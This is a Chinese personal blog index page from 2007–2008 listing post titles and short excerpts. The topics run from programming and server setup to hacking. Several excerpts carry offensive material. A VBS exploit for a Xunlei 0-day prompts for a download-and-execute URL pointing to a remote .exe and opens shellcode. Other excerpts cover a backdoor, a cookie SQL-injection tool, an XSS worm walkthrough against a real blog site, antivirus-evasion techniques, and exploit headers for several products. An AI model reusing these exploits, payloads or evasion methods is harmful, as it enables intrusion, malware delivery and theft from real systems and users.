- 博客(127)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 国际:程序员V.S.编程语言:你上“贼船”了吗?
如果编程语言也是一条船程序员与编程语言一直都被热烈讨论的话题。这里不妨引入一个新的思考方向,如果将编程语言比作一条船,那么程序员又将扮演一个什么样的角色?是载舟的水,还是坐船的人?Turing图灵无疑是一条独木舟,它很小并且需要纯手工驱动。这是一条适合初学者的“船”。JavaJava 是一条货船。它的体积庞大、承载量大,非常企业级。不过在运行一个项目时,操作并不那么顺手。PerlPerl是一艘拖船
2008-05-12 14:28:00
917
4
原创 感动 好好照顾妈妈
树欲静而风不息。 子欲养而亲不在。 乃劝为人之子女者。应当及时事亲尽孝。则不致思欲孝养父母。而父母已亡。追忏 已晚矣。 一篇感人的文章 -- 做人子女者必看!! 媳妇说: "煮淡一点妳就嫌没有味道,现在煮咸一点妳却说咽不下,妳究竟 怎么样?" 母亲一见儿子回来,二话不说便把饭菜往咀里送。 她怒瞪他一眼。 他试了一口,马上吐出来,儿子说: " 我不是说过了吗,妈有病不能吃太咸!" 那好!妈是你的,以
2008-04-16 21:32:00
911
原创 试用百度安全中心
2008年2月27日,百度安全中心正式上线, 百度安全中心是和金山毒霸合作的一个产品。先试用下.以前用过一个国外的一个测试系统风险的,好象是要安装的.并且分的也比较细,只是都是英语,不怎么容易明白,相信百度安全中心对大家是一个不错的选择。下图就是百度安全中心的界面,还有一个百度的二级域名。我们在使用百度安全中心的时候它会提示安装一个插件。1=780) window.open(http://bbs
2008-02-28 13:06:00
773
原创 百度真的没有编辑
百度真的没有编辑一个乙肝新闻放入互连网百度,不能只靠关键字定位,一个乙肝的新闻有必要放到互联网新闻里吗,建议即时 说关键字收集也要审核下,这肯定不是第一次出现错误,有损百度在国人眼中的形象。
2008-02-28 10:30:00
547
原创 郁闷
北京今天又下了一场雪,也不是很冷。不过上午下的挺大,不过时间挺短。还没等落地上。就已经没了,打雪仗的想法也落空了,老天也不让玩的开心点,真是很无奈,在我住的宿舍,一天到晚都看不到阳光,结果早上一睁眼八点二十,速度的洗脸,飞一般的速度跑到公司,明明说我的表才八点二十九,一打卡都八点三十二了,不仅是早饭没吃,还迟到了2分钟。 天天上班也没什么累的,可是最近老觉的象缺点什么,应该是在技术
2008-01-17 20:41:00
504
原创 FreeBSD 6.2快速架设网站服务器教程(Apache2.2.X+MySQL5.X.X+ PHP5.2.X+ ZendOptimizer-3.2.X)
FreeBSD 6.2快速架设网站服务器教程(Apache2.2.X+MySQL5.X.X+ PHP5.2.X+ ZendOptimizer-3.2.X)
2007-12-05 20:32:00
986
原创 Redhat Fedora Core 6 Linux安装流程
Redhat Fedora Core 6 Linux安装流程 世界网络教研室整理
2007-12-05 20:30:00
1314
3
原创 一个vlc播放器的 利用
Core Security Technologiess - CoreLabs Advisory http://www.coresecurity.com/corelabs VLC Activex Bad Pointer Initialization Vulnerability*Advisory Information*Title: VLC Activex B
2007-12-05 18:34:00
981
原创 ASP漏洞+SQL注入的入侵方法总结
本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下。 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息。再用nmap -sS IP -P0 -p 139 ,透过防火墙查看是否开有139端口。从上面得到的信息我们可以简单的判断到:主机A的系统是什么,装有防火墙的话,一般是只允许80端口开放的。如果能够泄漏asp源文件,当然是最好不过的了,但是一般难得遇到。
2007-12-04 14:23:00
843
原创 vbs也写EXP]xunlei_0day_exp
来源:vbs空间exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )code by NetPatchif exeurl code="/x43/x43/x43/x43/x43/x43/xe9/xa3/x00/x00/x00/x5f/x64/xa1/x30/x00/x00/x00/x8b/x40/x
2007-11-19 19:08:00
502
原创 cookies注入加速工具-PHP版
作者:职业欠钱来源:职业欠钱&zj1244共用的public Blog/*cookies 注入也加速 工具 PHP版by 职业欠钱最近遇到一个挂了防注入的东东,COOKIE注入可行,不过手工注入太辛苦了,便四处寻找加速工具mika的工具依赖于SQL 错误开启的模式,而我遇到的这个是不显示错误信息的只能够盲注了。曾经找到一个ASP版的加速工具,其原理是将GET变量放到COOKIE里,然后调用XM
2007-11-19 19:07:00
910
原创 谈VBS在Hacking中的作用之二
NetPatch此文已经发于黑客手册第十一期上一期写了一个VBS的注入脚本,这次给大家带来两个脚本,希望小菜们能喜欢。一.挑选速度快的肉鸡做VPN。当自己从小菜鸟转型为老菜鸟时,就懂得考虑在玩Hacking的同时也要尽量保证不暴露自己。万事,安全第一嘛!不然都不知道哪天玩着玩着就被警察叔叔带去喝茶了^_^ 。因此,作为老菜鸟的我们,要学会在Hacking时,多用VPN+终端等跳板措施来保护自己,尽
2007-11-17 23:28:00
805
原创 谈VBS在Hacking中的作用———SQL Inject中的应用
本文,已发于《黑客手册》07年10月刊平常我们遇到有注入漏洞一类的网站大部分人都是用NBSI Or 阿D一类的注射工具。但有的站点的注射点很难构造,或者说注射语句比较特殊。如果用手工去注射的话,费时又费力!但自己写针对性的工具的话,对一些刚入门不久或不会编程的朋友来说,实在是一件很痛苦的事情。因此今天NP给大家带来的文章就是讲如何用简单的VBS脚本来打造我们所要的注射工具。在您继续看这篇文章之前,
2007-11-17 23:27:00
639
原创 常用工具名词解释
webadv:针对iis+sp3的溢出成功率很高(溢出后system权限!) ipscan:大范围网段快速ipc猜解 svc:远程安装/删除Win2k服务 3389.vbs:远程安装Win2k终端服务不需i386 arpsniffer:arp环境sniffer(需要Winpcap2.1以上) ascii:查询字符和数字ascii码(常用来对url编码用以躲避
2007-11-14 13:08:00
1345
转载 也谈跨站脚本攻击与防御
网络上曾经有过关于跨站脚本攻击与防御的文章,但是随着攻击技术的进步,以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了,而且由于这种对于跨站脚本认识上的混乱,导致现在很多的程序包括现在的动网都存在着跨站脚本过滤不严的问题,希望本文能给写程序的与研究程序的带来一点思路。还是首先看看跨站脚本漏洞的成因,所谓跨站脚本漏洞其实就是Html的注入问题,恶意用户的输入没有经过严格的控制进入
2007-11-13 13:15:00
458
原创 Bind后门
Bind后门.体积仅有629字节!!!!支持多用户登录,多线程支持!!!屏蔽了.安装,过主防等危害功能...主页:www.eviloctal.comEmail:Anskya[AT]Gmail.comAnskya 加入E.S.T第一个作品,请大家多多支持和帮助我感谢曾经帮助过和支持过我的朋友们,谢谢大家!!!啊哈哈~不好意思实在不知道说什么好...最近捣鼓PE融缩技术...nasm的编译器
2007-11-08 12:52:00
467
原创 完整XSS wrom入侵流程
完整XSS wrom入侵流程不说废话,且看怎么实现,我先拿SOHU BLOG做示范.1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,//前是真正的空格),在个人档案处看过滤了哪些.’’;:!--"=&#{()} //结果’’;:!--"=&#{()} // (&后是amp,论坛过滤了)过滤了"javascript","&"和"/"这两个
2007-11-08 12:52:00
788
原创 HTML语法大全,送给初学者!
批注 跑马灯 ...普通卷动 ...滑动 ...预设卷动 ...来回卷动 ...向下卷动 ...向上卷动 向右卷动 向左卷动 ...卷动次数 ...设定宽度 ...设定高度 ...设定背景颜色 ...设定卷动距离 ...设定卷动时间 字体效果 ...标题字(最大) ...标题字(最小) ...粗体字 ...粗体字(强调) ...斜体字 ...斜体字(强调) ...斜体字(表示定义) ...底
2007-11-08 12:50:00
402
原创 VLAN虚拟局域网 从入门到精通
一、什么是三层交换和VLAN 要回答这个问题我们还是先看看以太网的工作原理。以太网的工作原理是利用二进制位形成的一个个字节组合成一帧帧的数据(其实是一些电脉冲)在导线中进行传播。 首先,以太网网段上需要进行数据传送的节点对导线进行监听,这个过程称为CSMA/CD(Carrier Sense Multiple Access with Collision Detection带有冲突监测的载波
2007-11-06 19:17:00
581
原创 在线推广网站的14招
1、将你的网站提交到搜索引擎,这样你的网站就有了最大暴光率的可能性; 2、如果你期望得到更多的暴光机会,你可以付费进行搜索引擎营销 (Search Engine Marketing) 。当浏览者用固定的关键词搜索时,就会有在搜索引擎网站上出现你网站的文字广告; 3、开展一个抽奖活动。在一定的时间里,如果有人在你的网站上进行了注册或订阅电子邮件通讯,他就有可能得到免费的礼品; 4、每周给
2007-11-05 21:25:00
348
原创 网站优化设计的含义
在搜索引擎优化系列文章的第一部分和第二部分,分别介绍了搜索引擎优化中片面追求google PageRank,以及没有充分认识网站建设和网站推广之间关系的问题,使得许多企业在策划和建设阶段没有做好企业网站的优化设计工作,而在进行搜索引擎推广时才不得不面对这一尴尬的问题,由于这些简单的错误而影响了网站推广的时机和效果。本文将介绍我所理解的网站优化设计的含义,在《网络营销基础与实践》第2版中我也提出了这
2007-11-05 21:24:00
447
原创 免杀的简单原理
免杀,顾名思义就是说避免被杀毒软件查杀! 免杀的方法也有很多种,针对不同的情况我们运用不同的免杀方法。 ⒈文件免杀:加花/修改文件特征码/加壳/修改加壳后的文件。 ⒉内存免杀:修改特征码。 ⒊行为免杀。 现在我来揭开免杀神秘的面纱。(这里不对免杀做深入讨论,只对原理进行分析,毕竟这不是黑客教程) 加花 加花是病毒免杀的常用手段,加花原理就是通过添加加花指令(一些垃圾指令,类似加1减1之类的无用语句
2007-11-05 21:07:00
572
转载 热门技术探讨之跨站式入侵(图) (heibai)
最近朋友们老是弄些跨站,一会看这个站被跨站 那个站又被跨站,我看也无聊 顺便弄一些玩玩,到百度上随便搜索了几个站的地址 结果一 测试 全都可以弄,这不得不让人很担心啊。 以下是几个站的截图和地址 TOM网 http://search.tom.com/search.php?f=8&cl=3&f=8&edt=0&word=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscrip
2007-11-04 18:12:00
379
原创 guppy 4.6.3远程文件共享
vuln.: GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion script info and download: http://www.freeguppy.org/ dork: "Site powered by GuppY" author: irk4z[at]yahoo.pl greets to: s
2007-11-03 19:00:00
638
原创 黑客瞄准IE7高危漏洞
微软近日警告用户注意防范可疑的网站和E-Mail带来的危险,因为Internet Explorer 7已经被公开出一个未修补的漏洞.公司并没有详细指出相关的细节,但宣称有一小部分黑客已经开始利用它.这一漏洞依然来自问题频发的uniform resource indicator (URI)命令控制中,它主要用来启动第三方应用程序.微软早在10月10日就已经注意到该问题,目前包括XP和2003系统在内
2007-11-03 18:57:00
391
原创 关于doc命令可以同时执行两条的困扰
前段时间,有个关于foxdocmd的本地溢出远程执行命令的漏洞被公布,但是 只可以执行一条命令。非常郁闷。想到了vbs的执行代码,可是还是只可以执行一行,也就是说在cmd下只可以执行一条命令。实验了很多次都以失败告终,还有就是cmd下的/c命令也是很是郁闷。今天一个同事利用了"&"这个命令来先后执行两个命令,首先是利用tftp下载一个文件然后执行。呵呵。好多天的困扰终于解决了,虽然不是我自己解决了
2007-11-03 18:56:00
513
原创 QQ Traveler漏洞分析与利用
漏洞概述腾讯TT(QQ Traveler)是一款多页面浏览器,具有亲切、友好的用户界面,提供多种皮肤供用户根据个人喜好使用,另外TT更是新增了多项人性化的特色功能,使上网冲浪变的更加轻松自如、省时省力。智能屏蔽一键开通, 最近浏览一键找回,多页面一键打开,浏览记录一键清除,多种皮肤随心变换,多线程高速旋风下载。 腾讯TT在处理地址栏输入的URL时,存在栈溢出漏洞。虽然其处理过程中对URL进行了Un
2007-11-02 18:55:00
753
原创 域名的相关含义
1.什么是域名?域名是Internet网络上的一个服务器或一个网络系统的名字,在全世界,没有重复的域名,域名具有唯一性。从技术上讲,域名只是一个Internet中用于解决地址对应问题的一种方法。可以说只是一个技术名词。但是,由于Internet已经成为了全世界人的Internet,域名也自然地成为了一个社会科学名词。 2.为什么要注册域名? Internet域名如同商标,是您在因特网上
2007-10-31 19:21:00
847
原创 动易网站管理系统vote.asp页面存在SQL注入漏洞
---------------------------------------------http://www.neeao.comNeeaos Security BlogBCT授权本站独家转载,转载请保留此签名。---------------------------------------------Infos: 漏洞预警中心小组应急事件响应公告(BCTCERA0701)Author: admi
2007-10-31 17:33:00
7637
1
原创 Admin Added Access
AGTC-Membership system v1.1a (adduser) Remote AddAdmin Exploit User Name: Password: Email Address:
2007-10-31 16:11:00
1901
原创 odak Image Viewer TIF/TIFF Code Execution Proof Of Concept
#include #define TIF_FILE "ms07-055.tif"unsigned char tif1[] ={ 0x49,0x49,0x2A,0x00,0x90,0x3E,0x00,0x00,0x80,0x3F,0xE0,0x50, 0x38,0x24,0x16,0x0D,0x07,0x84,0x42,0x61,0x50,0xB8,0x64,0x36, 0x
2007-10-30 20:42:00
552
原创 minibb 2.1 (表)远程sql注入利用
vuln.: miniBB 2.1 (table) Remote SQL Injection Exploit download: http://www.minibb.net/download.php?file=minibb21 dork: "These forums are running on" "miniBB" author: [email protected] gr
2007-10-30 15:27:00
529
原创 gom播放器远程缓冲区溢出
GOM Player 2.1.6.3499 GomWeb Control (GomWeb3.dll 1.0.0.12) remote bufferoverflow poc exploit (ie6/xp sp2)quote from Wikipedia: "GOM Player(Gretech Online Movie Player) is SouthKoreas most popular
2007-10-29 17:31:00
595
原创 Windows 2003 安装设置iis
安装篇2003默认安装不带IIS的,要安装,请点击开始->管理工具->配置您的服务器向导 然后一步步的下一步。到了列表选择项目的时候。 从列表中选择 应用服务器(IIS,ASP.NET) 然后确定,下一步 frontpage server extension和asp.net 如果要支持.Net,都打勾,前者vs用到。 然后一路下一步。成功后最后mmc管理
2007-10-28 21:34:00
477
原创 igm.exe病毒病毒清除办法:
igm.exe病毒病毒清除办法:以上两点都具有病毒的特征,自启动和自保护 可以判定这个程序是一个病毒。 既然是病毒,就要删除。 清除此文件的突破口就是停止此文件运行。 这里就用到了一个禁用文件的命令了,禁用了文件,文件就不会运行,这样就可以轻松清除了~~ 先打开cmd (按开始-运行-输入“CMD”-打开-出现黑框) 然后输入下边说要输入的命令,回车。 reg add "H
2007-10-28 21:33:00
523
1
原创 Paris让你在内网渗透中事半功倍.
首发:邪恶八进制信息安全团队(www.eviloctal.com)下载地址:http://www.box.net/shared/str594q594Paris/0.2.1 (01/14/2007)研究成果:www.rootkit.com.cnwww.horseb.org软件作者:horseb (黑色技术成员组 www.rootkit.com.cn )此工具能够让你在内网渗透中事半功倍.让你的计算
2007-10-28 15:53:00
489
原创 ipc$
一 摘要 二 什么是ipc$ 三 什么是空会话 四 空会话可以做什么 五 ipc$所使用的端口 六 ipc管道在hack攻击中的意义 七 ipc$连接失败的常见原因 八 复制文件失败的原因 九 关于at命令和xp对ipc$的限制 十 如何打开目标的IPC$共享以及其他共享 十一 一些需要shell才能完成的命令 十二 入侵中可能会用
2007-10-28 14:20:00
922
原创 Win32下apache,perl环境建立
本文将谈论的Windows98SE下的apache和perl。涉及的内容有Windows98SE下的apache和perl的安装,以及确认他们正在正常工作。如果你已经是apache和perl的使用者并且对Windows98SE下的apache和perl不感兴趣,请您跳过本文。本文中提到的一些方法,已经在我的机器上通过了验证,但是不排除在其他系统上不能正常工作的可能.和你一样我也是一个Perl的初学
2007-10-28 10:04:00
375
原创 perl环境配置及模块配置
.安装新版本的perlPerl通常位于/usr/local/bin/perl或/usr/bin/perl中。你可以在www.cpan.org得到他的最新版本,在这里我们使用perl-5.8.5.tar.gz 安装过程为: (1)解压: $gunzip perl-5.8.5.tar.gz $tar xvf perl-5.8.5.tar.gz (2
2007-10-28 09:47:00
590
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人